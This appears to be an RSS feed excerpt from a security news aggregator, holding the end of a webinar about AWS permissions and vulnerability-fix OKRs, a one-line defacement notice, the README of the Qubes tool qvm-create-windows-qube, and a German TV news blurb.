of companies that have grown their AWS setup organically, there are some folks who’ve been with the company for a long time that probably have broader permissions than they need. Coming back to this automated tools thing that I keep harping on, there are great tools that exist that can tell you exactly which resources a user recently accessed in a 90 day period or something like that. And generally you can scope the permissions pretty tightly to make sure they need no more than they actually need. Those are kind of the top of mind things for me.</p><p><strong>Alex Marshall:</strong> I think it is really a fact of modern software that there’s a massive number of dependencies, and so I think a lot of the automation is definitely very important. We hear that quite a bit. I think one of these often comes up on this topic, and this probably be a good topic to wrap things up on is, whose responsibility is that? I think a lot of times there’s diffuse responsibility around who should really be in charge of checking dependencies, managing security, things like that. And I think a lot of organizations would say that it’s everybody’s job, but then at the same time it sort of becomes no one’s job. don’t know what you’ve seen work well or not work well around that.</p><p><strong>Cameron Seebach:</strong> One of the things that has worked really well for us, the Pill Club is we actually set an OKR on the DevOps team around security risks like that. We said, “Based on the severity of the issue scored on the typical CVSS scale, if it is a critical issue, we need to have it 95% of the time we turn it around within two days or less.”</p><p>We are working on getting there, it’s a pretty big ask, but that helps give a sense of urgency to fixing these things when they are tracked in a company level objective. And what that has ended up looking like for us is that we partner very closely with backend engineers who need to make the updates and test the functionality to make sure it’s still working, but we will typically set up the base change in a poll request.</p><p>That’s basically like, “Hey, bump this library version to this level and see what breaks, and then it’s your job to fix it”. Whoever has been assigned to this particular issue. And that’s worked pretty well for us so far. Intentionally we set a 95% target on these things, because we know there are going to be some issues that require very large changes that we may not be able to get to within that timeframe, but it sets a pretty high bar, and we have seen engineers on the backend teams make time to fix these things because they also know how important it is. And they also know that I’ll keep bugging them if they don’t get it done.</p><p><strong>Alex Marshall:</strong> That’s great. I think there’s actually a lot of companies that are learning around actually incorporating some of these objectives into OKRs. That sounds like a pretty fantastic processor guys aside. Any closing thoughts, like we’ve covered a lot of things here, we covered some of the specifics of what you’ve done internally, some of the thoughts on your trust, filling things out internally, your background, anything else you’d like to say to the folks listening?</p><p><strong>Cameron Seebach:</strong> Gosh, that’s a big responsibility Alex. If you are in this webinar, chances are that you have some interest in the technologies at play here. First of all, I commend you for that. There are a lot of ways that you can improve and enhance the security posture of your organization. And whether you decide to adopt a Zero Trusts technology or not just the fact that you’re here listening is really good. The things I would close out on would be to say, one of the central challenges in software is how do I make use of the work of other people?</p><p><strong>Cameron Seebach:</strong> Because you’re always running out of time or have limited resources to accomplish a task. And most of the time there is someone out there who has solved that problem already more or less. There’s a saying, “There are no new problems in software engineering.” When I think about adopting any new technology, be it Zero Trust, be it Docker containers, be it changing IDEs, the number one thing I think about is does this make use of a lot of work that someone else has already done? And that’s one indicator of how much use it can be to you. That might be my parting thought actually.</p><p><strong>Alex Marshall:</strong> I really like that. Well, great. Well, Cameron, it’s been really enjoyable chatting with you. Thank you for presenting and sharing all your thoughts. We really appreciate you guys as a <a href="https://www.twingate.com/customers/?utm_source=blog&amp;utm_medium=blog&amp;utm_campaign=pill-club-fireside-chat">customer</a> as well, but thank you very much. I think we’ll wrap things up here.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[https://fja.gov.pk/elliot.txt]]></title>
<description><![CDATA[https://fja.gov.pk/elliot.txt notified by NULL SQU4D]]></description>
<link>https://tsecurity.de/de/1515701/hacking/httpsfjagovpkelliottxt/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1515701/hacking/httpsfjagovpkelliottxt/</guid>
<pubDate>Sat, 31 Jul 2021 09:00:47 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[https://fja.gov.pk/elliot.txt notified by NULL SQU4D]]></content:encoded>
</item>
<item>
<title><![CDATA[Qvm-Create-Windows-Qube - Spin Up New Windows Qubes Quickly, Effortlessly And Securely]]></title>
<description><![CDATA[qvm-create-windows-qube is a tool for quickly and conveniently installing fresh new Windows qubes with Qubes Windows Tools (QWT) drivers automatically. It officially supports Windows 7, 8.1 and 10 as well as Windows Server 2008 R2, 2012 R2, 2016 and 2019.  The project emphasizes correctness, secu...]]></description>
<link>https://tsecurity.de/de/1484230/it-security-nachrichten/qvm-create-windows-qube-spin-up-new-windows-qubes-quickly-effortlessly-and-securely/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1484230/it-security-nachrichten/qvm-create-windows-qube-spin-up-new-windows-qubes-quickly-effortlessly-and-securely/</guid>
<pubDate>Wed, 26 May 2021 15:45:35 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="separator"><a href="https://1.bp.blogspot.com/-7oNeVGvkWtI/YKrwmlHGj7I/AAAAAAAAWQ4/tdrI2t8d7TcVNx_2wQqA791Fdzt0cfO5QCNcBGAsYHQ/s400/qvm-create-windows-qube_1_logo.png" imageanchor="1"><img border="0" data-original-height="400" data-original-width="400" height="320" src="https://1.bp.blogspot.com/-7oNeVGvkWtI/YKrwmlHGj7I/AAAAAAAAWQ4/tdrI2t8d7TcVNx_2wQqA791Fdzt0cfO5QCNcBGAsYHQ/s320/qvm-create-windows-qube_1_logo.png"></a></div><p><br></p>  <p>qvm-create-windows-qube is a tool for quickly and conveniently installing fresh new Windows <a href="https://www.qubes-os.org/" rel="nofollow" target="_blank" title="qubes">qubes</a> with <a href="https://www.qubes-os.org/doc/windows-tools/" rel="nofollow" target="_blank" title="Qubes Windows Tools (QWT)">Qubes Windows Tools (QWT)</a> drivers automatically. It officially supports Windows 7, 8.1 and 10 as well as Windows Server 2008 R2, 2012 R2, 2016 and 2019.</p>  <p>The project emphasizes correctness, security and treating Windows as an untrusted guest operating system throughout the entire process. It also features other goodies such as automatic installation of packages including Firefox, Office 365, Notepad++, Visual Studio and more using <a href="https://chocolatey.org/" rel="nofollow" target="_blank" title="Chocolatey">Chocolatey</a>.</p><span><a name="more"></a></span><div><br></div><span><b>Installation</b></span><br><ol><li>Download the <a href="https://raw.githubusercontent.com/elliotkillick/qvm-create-windows-qube/master/install.sh" rel="nofollow" target="_blank" title="installation script">installation script</a> by opening the link, right-clicking and then selecting "Save [Page] as..."</li>  <li>Copy <code>install.sh</code> into Dom0 by running the following command in Dom0:  <ul><li><code>qvm-run -p --filter-escape-chars --no-color-output &lt;qube_script_is_located_on&gt; "cat '/home/user/Downloads/install.sh'" &gt; install.sh</code></li>  </ul></li>  <li>Review the code of <code>install.sh</code> to ensure its integrity  <ul><li>Safer with escape character filtering enabled above; qvm-run disables it by default when output is a file</li>  </ul></li>  <li>Run <code>chmod +x install.sh &amp;&amp; ./install.sh</code>  <ul><li>Note that this will install packages in the global default <code>TemplateVM</code>, which is <code>fedora-XX</code> by default</li>  </ul></li>  <li>Review the code of the resulting <code>qvm-create-windows-qube.sh</code></li>  </ol><p>A more streamlined and secure installation process with packaging will be shipping with Qubes R4.1.</p>  <br><span><b>Usage</b></span><br><div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="Usage: ./qvm-create-windows-qube.sh [options] -i &lt;iso&gt; -a &lt;answer file&gt; &lt;name&gt;    -h, --help    -c, --count &lt;number&gt; &lt;a title=" href="https://www.kitploit.com/search/label/Number%20of%20Windows" number="" of="" windows="">Number of Windows qubes with given basename desired    -t, --template Make this qube a TemplateVM instead of a StandaloneVM    -n, --netvm &lt;qube&gt; NetVM for Windows to use    -s, --seamless Enable seamless mode persistently across reboots    -o, --optimize Optimize Windows by disabling unnecessary functionality for a qube    -y, --spyless Configure Windows telemetry settings to respect privacy    -w, --whonix Apply Whonix recommended settings for a Windows-Whonix-Workstation    -p, --packages &lt;packages&gt; Comma-separated list of packages to pre-install (see available packages at: https://chocolatey.org/packages)    -i, --iso &lt;file&gt; Windows media to automatically install and setup    -a, --answer-file &lt;xml file&gt; Settings for Windows installation  "&gt;<pre><code>Usage: ./qvm-create-windows-qube.sh [options] -i &lt;iso&gt; -a &lt;answer file&gt; &lt;name&gt;<br>  -h, --help<br>  -c, --count &lt;number&gt; Number of Windows qubes with given basename desired<br>  -t, --template Make this qube a TemplateVM instead of a StandaloneVM<br>  -n, --netvm &lt;qube&gt; NetVM for Windows to use<br>  -s, --seamless Enable seamless mode persistently across reboots<br>  -o, --optimize Optimize Windows by disabling unnecessary functionality for a qube<br>  -y, --spyless Configure Windows telemetry settings to respect privacy<br>  -w, --whonix Apply Whonix recommended settings for a Windows-Whonix-Workstation<br>  -p, --packages &lt;packages&gt; Comma-separated list of packages to pre-install (see available packages at: https://chocolatey.org/packages)<br>  -i, --iso &lt;file&gt; Windows media to automatically install and setup<br>  -a, --answer-file &lt;xml file&gt; Settings for Windows installation<br></code></pre></div>  <br><b>Downloading Windows ISO</b><br><p>The <code>windows-media/isos/download-windows.sh</code> script (in <code>windows-mgmt</code>) securely downloads the official Windows ISO to be used by <code>qvm-create-windows-qube</code>.</p>  <br><b>Creating Windows VM</b><br><br><b>Windows 10</b><br><p><code>./qvm-create-windows-qube.sh -n sys-firewall -oyp firefox,notepadplusplus,office365proplus -i win10x64.iso -a win10x64-pro.xml work-win10</code></p>  <p><code>./qvm-create-windows-qube.sh -n sys-firewall -oyp steam -i win10x64.iso -a win10x64-pro.xml game-console</code></p>  <br><b>Windows Server 2019</b><br><p><code>./qvm-create-windows-qube.sh -n sys-firewall -oy -i win2019-eval.iso -a win2019-datacenter-eval.xml fs-win2019</code></p>  <br><b>Windows 10 LTSC</b><br><ul><li>A more stable, minified, secure and private version of Windows 10 officially provided by Microsoft</li>  </ul><p><code>./qvm-create-windows-qube.sh -n sys-firewall -oyp firefox,notepadplusplus,office365proplus -i win10x64-ltsc-eval.iso -a win10x64-ltsc-eval.xml work-win10</code></p>  <p><code>./qvm-create-windows-qube.sh -n sys-whonix -oyw -i win10x64-ltsc-eval.iso -a win10x64-ltsc-eval.xml anon-win10</code></p>  <br><b>Windows 7</b><br><ul><li>Not recommended because Windows 7 is no longer supported by Microsoft, however, it's the only desktop OS the Qubes GUI driver (in Qubes Windows Tools) supports if seamless window integration or dynamic resizing is required</li>  <li>See the Security &gt; Windows &gt; Advisories section below for more info</li>  </ul><p><code>./qvm-create-windows-qube.sh -n sys-firewall -soyp firefox,notepadplusplus,office365proplus -i win7x64-ultimate.iso -a win7x64-ultimate.xml work-win7</code></p>  <br><span><b>Security</b></span><br><p>qvm-create-windows-qube is "reasonably secure" as <a href="https://www.qubes-os.org/" rel="nofollow" target="_blank" title="Qubes">Qubes</a> would have it.</p>  <ul><li><code>windows-mgmt</code> is air gapped</li>  <li>The entirety of the Windows qube setup process happens is done air gapped  <ul><li>There is an exception for installing packages at the very end of the Windows qube installation</li>  </ul></li>  <li>Entire class of <a href="https://www.kitploit.com/search/label/Command%20Injection" target="_blank" title="command injection">command injection</a> <a href="https://www.kitploit.com/search/label/vulnerabilities" target="_blank" title="vulnerabilities">vulnerabilities</a> eliminated in the Dom0 shell script by not letting it parse any output from the untrusted <code>windows-mgmt</code> qube  <ul><li>Only exit codes are passed by <code>qvm-run</code>; no variables</li>  <li>This also mitigates the fallout of another <a href="https://en.wikipedia.org/wiki/Shellshock_(software_bug)" rel="nofollow" target="_blank" title="Shellshock">Shellshock</a> Bash vulnerability</li>  </ul></li>  <li>Downloading of the Windows ISOs is made secure by enforcing:  <ul><li>ISOs are downloaded straight from Microsoft controlled subdomains of <code>microsoft.com</code></li>  <li>HTTPS TLS 1.2/1.3</li>  <li>HTTP public key pinning (HPKP) to whitelist the website's certificate instead of relying on certificate authorities (CAs)  <ul><li>Qubes aims to <a href="https://www.qubes-os.org/faq/#what-does-it-mean-to-distrust-the-infrastructure" rel="nofollow" target="_blank" title="distrust the infrastructure">"distrust the infrastructure"</a></li>  <li>Remember, <code>transport security = encryption * authentication</code> (This allows for the utmost authentication)</li>  </ul></li>  <li>SHA-256 verification of the files after download</li>  </ul></li>  <li>Windows is treated as an untrusted guest operating system the entire way through</li>  <li>All commits by the maintainers are always signed with their respective PGP keys  <ul><li>Should signing ever cease, assume compromise</li>  <li>Current maintainer 1: <a href="https://github.com/elliotkillick" rel="nofollow" target="_blank" title="Elliot Killick">Elliot Killick</a><ul><li>PGP key: 018F B9DE 6DFA 13FB 18FB 5552 F9B9 0D44 F83D D5F2</li>  </ul></li>  <li>Current maintainer 2: <a href="https://github.com/fepitre" rel="nofollow" target="_blank" title="Frédéric Pierret">Frédéric Pierret</a> (No Keybase account)  <ul><li>PGP key: 9FA6 4B92 F95E 706B F28E 2CA6 4840 10B5 CDC5 76E2</li>  <li>Mostly concerned with Qubes R4.1 support  <ul><li>See the <code>release4.1</code> branch and <a href="https://github.com/fepitre/qubes-mgmt-salt-windows-mgmt" rel="nofollow" target="_blank" title="qubes-mgmt-salt-windows-mgmt">qubes-mgmt-salt-windows-mgmt</a></li>  </ul></li>  </ul></li>  </ul></li>  <li>The impact of any theoretical vulnerabilities in handling of the Windows ISO (e.g. <a href="https://www.kitploit.com/search/label/Vulnerability" target="_blank" title="vulnerability">vulnerability</a> in filesystem parsing) or answer file is limited to <code>windows-mgmt</code></li>  </ul><br><b>Windows</b><br><br><b>Maintenance</b><br><p>Don't forget to apply any applicable updates upon creation of your Windows qube. Microsoft frequently builds up-to-date ISOs for current versions of Windows, such as Windows 10. For these Windows versions, it's recommended to periodically visit the official Microsoft site <code>download-windows.sh</code> provides to get a fresh Windows image out of the box.</p>  <br><b>Advisories</b><br><p>Windows 7 and Windows Server 2008 R2 reached end of life (EOL) on <a href="https://support.microsoft.com/en-us/help/4057281/windows-7-support-will-end-on-january-14-2020" rel="nofollow" target="_blank" title="January 14, 2020">January 14, 2020</a>. Updates for these OSs are still available with Extended Security Updates (ESUs) if paid for. Office 365 for these OSs will continue getting security updates at no additional cost until <a href="https://support.office.com/en-us/article/windows-7-end-of-support-and-office-78f20fab-b57b-44d7-8368-06a8493f3cb9" rel="nofollow" target="_blank" title="January 2023">January 2023</a>.</p>  <p>If RDP is to be enabled on a Windows 7 qube (not default) then make sure it is fully up-to-date because the latest Windows 7 ISO Microsoft offers is unfortunately still vulnerable to <a href="https://en.wikipedia.org/wiki/BlueKeep" rel="nofollow" target="_blank" title="BlueKeep">BlueKeep</a> and related DejaBlue vulnerabilities.</p>  <p>A critical vulnerability in Windows 10 and Windows Server 2016/2019 cryptography was <a href="https://media.defense.gov/2020/Jan/14/2002234275/-1/-1/0/CSA-WINDOWS-10-CRYPT-LIB-20190114.PDF" rel="nofollow" target="_blank" title="recently disclosed">recently disclosed</a>. This allows any and all cryptography in these OSs (including HTTPS; the little padlock in your browser) to be easily intercepted. When Microsoft releases an updated ISO, the direct links in <code>download-windows.sh</code> will be updated but until then please update your qubes if they run the aforementioned OSs.</p>  <br><span><b>Privacy</b></span><br><p>qvm-create-windows-qube aims to be the most private way to use Windows. Many Qubes users switched from Windows (or another proprietary OS) in part to get away from Microsoft (or Big Tech in general) and so being able to use Windows from a safe distance is of utmost importance to this project. Or at least, as safe a distance as possible for what is a huge, proprietary binary blob.</p>  <br><b>Windows Telemetry</b><br><p>Configures Windows telemetry settings to respect privacy.</p>  <ul><li>Opt-out of Customer Experience Improvement Program (CEIP)</li>  <li>Disable Windows Error Reporting (WER)</li>  <li>Disable DiagTrack service</li>  <li>Switch off all telemetry in Windows 10 "Settings" application</li>  <li>Enable "Security" level of telemetry on compatible editions of Windows 10</li>  <li>See <code>spyless.bat</code> for more info</li>  </ul><br><b>Whonix Recommendations for Windows-Whonix-Workstation</b><br><p>Everything mentioned <a href="https://www.whonix.org/wiki/Other_Operating_Systems" rel="nofollow" target="_blank" title="here">here</a> up to "Even more security" is implemented. "Most security" is to use an official Whonix-Workstation built yourself from source. This feature is not official or endorsed by Whonix.</p>  <p>It's recommended to read <a href="https://www.whonix.org/wiki/Windows_Hosts" rel="nofollow" target="_blank" title="this">this</a> Whonix documentation to understand the implications of using Windows in this way.</p>  <br><b>Easy to Reset Fingerprint</b><br><p>There are countless unique identifiers present in every Windows installation such as the MachineGUID, installation ID, NTFS drive Volume Serial Numbers (VSNs) and more. With qvm-create-windows-qube, these unique identifiers can easily be reset by automatically reinstalling Windows.</p>  <br><b>Limitations</b><br><p>Fingerprinting is possible through the hypervisor in the event of VM compromise, here are some practical examples (not specific to Windows):</p>  <ul><li><a href="https://phabricator.whonix.org/T389" rel="nofollow" target="_blank" title="Xen clocksource as wallclock">Xen clocksource as wallclock</a>  <ul><li>Timezone leak can at least be mitigated by configuring UTC time in the BIOS/UEFI, the local timezone can still be configured for XFCE Dom0 clock</li>  <li>However, correlation between other VMs remains trivial</li>  </ul></li>  <li><a href="https://github.com/QubesOS/qubes-issues/issues/1142" rel="nofollow" target="_blank" title="CPUID">CPUID</a></li>  <li>Generally some of the VM interfaces documented <a href="https://www.qubes-os.org/doc/vm-interface/" rel="nofollow" target="_blank" title="here">here</a> (e.g. screen dimensions)</li>  </ul><br><span><b>Contributing</b></span><br><p>You can start by giving this project a star! High quality PRs are also welcome! Take a look at the todo list below if you're looking for things that need improvement. Other improvements such as more elegant ways of completing a task, code cleanup and other fixes are also welcome.</p>  <p>Lots of Windows-related <a href="https://www.qubes-os.org/gsoc/" rel="nofollow" target="_blank" title="GSoCs">GSoCs</a> for those interested.</p>  <p>The logo of this project is by Max Andersen, used with written permission.</p>  <p>This project is the product of an independent effort that is not officially endorsed by Qubes OS.</p>  <br><span><b>Qubes Windows Tools Known Issues</b></span><br><p>Please send patches for these if you are able to. Although, be aware that Qubes Windows Tools is <a href="https://github.com/elliotkillick/qvm-create-windows-qube/issues/15" rel="nofollow" target="_blank" title="currently unmaintained">currently unmaintained</a>.</p>  <br><b>All OSs</b><br><ul><li><a href="https://github.com/QubesOS/qubes-issues/issues/5739" rel="nofollow" target="_blank" title="No Windows display when Qubes GUI driver is not installed">No Windows display when Qubes GUI driver is not installed</a>  <ul><li>Any OS other than Windows 7/Windows Server 2008 R2 does not support Qubes GUI driver</li>  <li>Temporary fix: Run <code>qvm-features &lt;windows_qube&gt; gui 1</code> to make the display show up after Windows qube creation is complete</li>  </ul></li>  </ul><br><b>All OSs except Windows 7/Windows Server 2008 R2</b><br><ul><li><a href="https://github.com/QubesOS/qubes-issues/issues/5091" rel="nofollow" target="_blank" title="Prompt to install earlier version of .NET">Prompt to install earlier version of .NET</a>  <ul><li>This only appears to be a cosmetic issue because qrexec services still work</li>  <li>Has been merged but QWT needs to be rebuilt to include it and there's currently no maintainer</li>  </ul></li>  </ul><br><b>Windows 10/Windows Server 2019</b><br><ul><li><a href="https://github.com/QubesOS/qubes-issues/issues/5090" rel="nofollow" target="_blank" title="Private disk creation fails">Private disk creation fails</a>  <ul><li>Temporary fix: Close <code>prepare-volume.exe</code> window causing there to be no private disk (can't make a <code>TemplateVM</code>) but besides that Windows qube creation will continue as normal</li>  <li>Has been merged but QWT needs to be rebuilt to include it and there's currently no maintainer</li>  </ul></li>  </ul><br><b>Mailing list threads</b><br><ul><li><a href="https://groups.google.com/forum/#!topic/qubes-users/AdQcjg7XOFo" rel="nofollow" target="_blank" title="qubes-users">qubes-users</a></li>  <li><a href="https://groups.google.com/forum/#!topic/qubes-devel/aCCGpYysZTQ" rel="nofollow" target="_blank" title="qubes-devel">qubes-devel</a></li>  </ul><br><b>Windows tagged Qubes OS GitHub issues</b><br><ul><li><a href="https://github.com/QubesOS/qubes-issues/labels/C%3A%20windows-tools" rel="nofollow" target="_blank" title="Spin up new Windows qubes quickly, effortlessly and securely (34)"><code>C: windows-tools</code></a></li>  <li><a href="https://github.com/QubesOS/qubes-issues/labels/C%3A%20windows-vm" rel="nofollow" target="_blank" title="Spin up new Windows qubes quickly, effortlessly and securely (35)"><code>C: windows-vm</code></a></li>  </ul><br><span><b>Todo</b></span><br><ul class="contains-task-list"><li class="task-list-item"> Gain the ability to reliably unpack/insert answer file/repack for any given ISO 9660 (Windows ISO format)  <ul class="contains-task-list"><li>ISO 9660 is write-once (i.e. read-only) filesystem; you cannot just add a file to it without creating a whole new ISO</li>  <li>Blocking issue for supporting other versions of Windows</li>  <li>This is the same way VMWare does it as can be seen by the "Creating Disk..." part in the video below (Further research indicates that they use <code>mkisofs</code>)</li>  <li class="task-list-item"> In the future, it would be best for Qubes to do this by <a href="https://github.com/QubesOS/qubes-issues/issues/5085" rel="nofollow" target="_blank" title="extending core admin for libvirt XML templates">extending core admin for libvirt XML templates</a>  <ul><li>Much faster</li>  <li>Saves storage due to not having to create a new ISO</li>  </ul></li>  </ul></li>  <li class="task-list-item"> auto-qwt takes D:\ making QWT put the user profile on E:\; it would be nicer to have it on D:\ so there is no awkward gap in the middle</li>  <li class="task-list-item"> Make Windows answer file automatically use default trial key for Windows installation without hard-coding any product keys anywhere (Windows is finicky on this one)</li>  <li class="task-list-item"> Support Windows 8.1-10 (Note: QWT doesn't fully officially any OS other than Windows 7 yet, however, everything is functional except the GUI driver)</li>  <li class="task-list-item"> Support Windows Server 2008 R2 to Windows Server 2019</li>  <li class="task-list-item"> Support Windows 10 Enterprise LTSC (Long Term Support Channel)  <ul><li>Provides security updates for 10 years, very stable and less bloat than stock Windows 10</li>  </ul></li>  <li class="task-list-item"> Provision Chocolatey</li>  <li class="task-list-item"> Add an option to slim down Windows as documented for Qubes <a href="https://www.qubes-os.org/doc/windows-template-customization/" rel="nofollow" target="_blank" title="here">here</a></li>  <li class="task-list-item"> Make <code>windows-mgmt</code> air gapped</li>  <li class="task-list-item"> I recently discovered this is a Qubes <a href="https://www.qubes-os.org/gsoc/" rel="nofollow" target="_blank" title="Google Summer of Code">Google Summer of Code</a> project  <ul class="contains-task-list"><li class="task-list-item"> Add automated tests  <ul><li>Using Travis CI for automated ShellCheck</li>  </ul></li>  <li class="task-list-item"> ACPI tables for fetching Windows the license embedded there  <ul><li>Found more info on this, should be very simple by just placing the following jinja libvirt template extension in <code>/etc/qubes/templates/libvirt/xen/by-name/&lt;windows_qube&gt;</code>  <ul><li>Thanks to @jevank for the <a href="https://github.com/QubesOS/qubes-issues/issues/5279#issuecomment-525947408" rel="nofollow" target="_blank" title="patch">patch</a></li>  </ul></li>  </ul></li>  <li class="task-list-item"> Port to Python  <ul><li>This seems like it would be unnecessary for scripts like <code>create-media.sh</code> where the Python script would essentially just be calling out to external programs</li>  <li>This would certainly be suitable for <code>qvm-create-windows-qube.sh</code> though  <ul><li>This would allow us to interchange data between Dom0 and the VM without worrying about another Shellshock</li>  </ul></li>  </ul></li>  </ul></li>  <li class="task-list-item"> Automatically select which answer file to use based on Windows ISO characteristics gathered from the <code>wiminfo</code> command (Currently a WIP; see branch)  <ul class="contains-task-list"><li><code>wiminfo</code> works just like DISM on Windows</li>  <li class="task-list-item"> Once core admin is extended to allow for libvirt XML templates (answer files) becomes possible (previous todo), we can also securely read the answer file from the ISO without even having to mount it as a loop device using <a href="https://libguestfs.org/" rel="nofollow" target="_blank" title="Spin up new Windows qubes quickly, effortlessly and securely (40)"><code>libguestfs</code></a>  <ul><li>I've also seen <code>libguestfs</code> used on QEMU/KVM so it's definitely a good candidate for this use case</li>  <li>Note that <code>libguestfs</code> cannot write (an answer file) to an ISO which is why we cannot use this library until we no longer need to create a whole new ISO to add the answer file to it</li>  </ul></li>  </ul></li>  <li class="task-list-item"> Follow <a href="https://www.whonix.org/wiki/Other_Operating_Systems" rel="nofollow" target="_blank" title="this">this</a> Whonix documentation to make Windows-Whonix-Workstation</li>  <li class="task-list-item"> Add functionality for <code>create-media.sh</code> to add MSUs (Microsoft Update standalone packages) to be installed during the Windows PE pass ("Installing updates...") of Windows setup  <ul><li>We could fix currently not working QWT installation for old Windows 7 SP1 and Windows Server 2008 R2 ISOs using <a href="https://github.com/QubesOS/qubes-issues/issues/3585#issuecomment-521280301" rel="nofollow" target="_blank" title="KB4474419">KB4474419</a> to add SHA-256 support</li>  <li>Allows us to get rid of <code>allow-drivers.vbs</code> hack by fixing SHA-256 automatic driver installation bug  <ul><li>The other option is to have Xen sign their drivers with SHA-1 as well, which other driver vendors seem to do, but is not ideal from a security standpoint</li>  </ul></li>  <li>Patch a couple Windows security bugs?  <ul><li>Patch BlueKeep for Windows 7 out-of-the-box</li>  <li>Windows Server 2008 R2 base ISO is also vulnerable to ETERNALBLUE and BlueKeep out-of-the-box</li>  <li>Probably not worth getting into that, users should just update the VM upon making it</li>  </ul></li>  </ul></li>  <li class="task-list-item"> Headless mode  <ul><li>Help wanted  <ul><li>What mechanism is there to accomplish this in Qubes? Something in Qubes GUI agent/daemon?</li>  </ul></li>  </ul></li>  <li class="task-list-item"> Package this project so its delivery can be made more streamlined and secure through <code>qubes-dom0-update</code>  <ul><li>Coming to Qubes R4.1</li>  </ul></li>  <li class="task-list-item"> Consider adding ReactOS support as an open source alternative to Windows  <ul class="contains-task-list"><li>This would be a good at least until a <a href="https://github.com/QubesOS/qubes-issues/issues/2809" rel="nofollow" target="_blank" title="ReactOS template is made">ReactOS template is made</a></li>  <li>Perhaps ReactOS developers may want to use this to develop ReactOS</li>  <li>Or maybe just add ReactOS as a template (outside of this project)  <ul><li>However, someone would have to maintain this template</li>  <li>Also, there may not be much point if QWT/Xen PV drivers don't work  <ul><li>At least for basic features like copy/paste and file transfer</li>  </ul></li>  </ul></li>  <li>Interest from both sides  <ul><li><a href="https://github.com/QubesOS/qubes-issues/issues/2809" rel="nofollow" target="_blank" title="Qubes OS">Qubes OS</a></li>  <li><a href="https://reactos.org/forum/viewtopic.php?p=126279#p126279" rel="nofollow" target="_blank" title="ReactOS">ReactOS</a>  <ul><li>"one of the most interesting offers for <a href="https://www.kitploit.com/search/label/Collaboration" target="_blank" title="collaboration">collaboration</a> we got till today"</li>  </ul></li>  </ul></li>  <li><a href="https://reactos.org/wiki/Create_an_unattended_Installation_CD" rel="nofollow" target="_blank" title="ReactOS unattended installations">ReactOS unattended installations</a> look to be different than Windows ones</li>  <li class="task-list-item"> Only blocking issue I could find is the QEMU SCSI controller type  <ul><li>Qubes could extend core admin to support configuring the SCSI controller in the libvirt template  <ul><li>This solution seems better because according to <a href="https://github.com/QubesOS/qubes-issues/issues/3651#issuecomment-420914348" rel="nofollow" target="_blank" title="this">this</a> comment it would also fix a bunch of other OSs whose installer doesn't support our current SCSI controller</li>  </ul></li>  <li>ReactOS could add support for our current SCSI controller type</li>  <li><a href="https://reactos.org/forum/viewtopic.php?t=17529" rel="nofollow" target="_blank" title="ReactOS Issue">ReactOS Issue</a></li>  <li><a href="https://github.com/QubesOS/qubes-issues/issues/3494" rel="nofollow" target="_blank" title="Qubes OS Issue">Qubes OS Issue</a></li>  <li>Exposing a different SCSI controller does not expand attack surface because QEMU runs in a Xen stub domain</li>  </ul></li>  <li>ReactOS is in alpha so for most users this probably won't be viable right now</li>  <li>Help wanted  <ul><li>No timeline for this currently</li>  </ul></li>  </ul></li>  </ul><br><span><b>End Goal</b></span><br><p>Have a feature similar (or superior) to <a href="https://www.youtube.com/watch?v=1OpDXlttmE0" rel="nofollow" target="_blank" title="VMWare's Windows Easy Install">VMWare's Windows "Easy Install"</a> feature on Qubes. VMWare's solution is proprietary and only available in their paid products.</p>  <p>VirtualBox also has <a href="https://blogs.oracle.com/scoter/oracle-vm-virtualbox-52:-unattended-guest-os-install" rel="nofollow" target="_blank" title="something similar">something similar</a> but it's not as feature-rich.</p>  <br><br><div><b><span><a class="kiploit-download" href="https://github.com/elliotkillick/qvm-create-windows-qube" rel="nofollow" target="_blank" title="Download Qvm-Create-Windows-Qube">Download Qvm-Create-Windows-Qube</a></span></b></div><div><b><br></b></div><img src="http://feeds.feedburner.com/~r/PentestTools/~4/vxosqvICzbg" height="1" width="1" alt="">]]></content:encoded>
</item>
<item>
<title><![CDATA[Law &amp; Order - Organized Crime verlängert! Elliot Stabler kehrt für Staffel 2 zurück]]></title>
<description><![CDATA["Law & Order: Organized Crime" geht weiter! Der US-Sender NBC spendiert der neuen Crime-Show eine 2. Staffel. Netzwelt weiß mehr darüber.
																					Dieser Artikel wurde einsortiert unter 
																	TV-Serie / Webserie,																	Entertainment,																	NBC,									...]]></description>
<link>https://tsecurity.de/de/1472428/it-nachrichten/law-amp-order-organized-crime-verlaengert-elliot-stabler-kehrt-fuer-staffel-2-zurueck/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1472428/it-nachrichten/law-amp-order-organized-crime-verlaengert-elliot-stabler-kehrt-fuer-staffel-2-zurueck/</guid>
<pubDate>Fri, 14 May 2021 22:30:53 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA["Law &amp; Order: Organized Crime" geht weiter! Der US-Sender NBC spendiert der neuen Crime-Show eine 2. Staffel. Netzwelt weiß mehr darüber.
																					Dieser Artikel wurde einsortiert unter 
																	<a href="https://www.netzwelt.de/serien/index.html">TV-Serie / Webserie</a>,																	<a href="https://www.netzwelt.de/video/index.html">Entertainment</a>,																	<a href="https://www.netzwelt.de/tv-sender/nbc.html">NBC</a>,																	<a href="https://www.netzwelt.de/serien/index.html">Serien</a>,																	<a href="https://www.netzwelt.de/serien/law--order-special-victims-unit/index.html">Law &amp; Order - Special Victims Unit: Staffeln und Episodenguide</a>,																	<a href="https://www.netzwelt.de/serien/law--order-organized-crime/index.html">Law &amp; Order - Organized Crime: Episodenguide und Staffeln</a>,																	<a href="https://www.netzwelt.de/serien/law--orderfor-the-defense/index.html">Law &amp; Order - For the Defense: Startdatum, Handlung und Trailer der NBC-Serie</a>.<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/netzwelt?a=4D6d36JgzWg:358hhJ6WN5o:qj6IDK7rITs"><img src="http://feeds.feedburner.com/~ff/netzwelt?d=qj6IDK7rITs" border="0"></a>
</div><img src="http://feeds.feedburner.com/~r/netzwelt/~4/4D6d36JgzWg" height="1" width="1" alt="">]]></content:encoded>
</item>
<item>
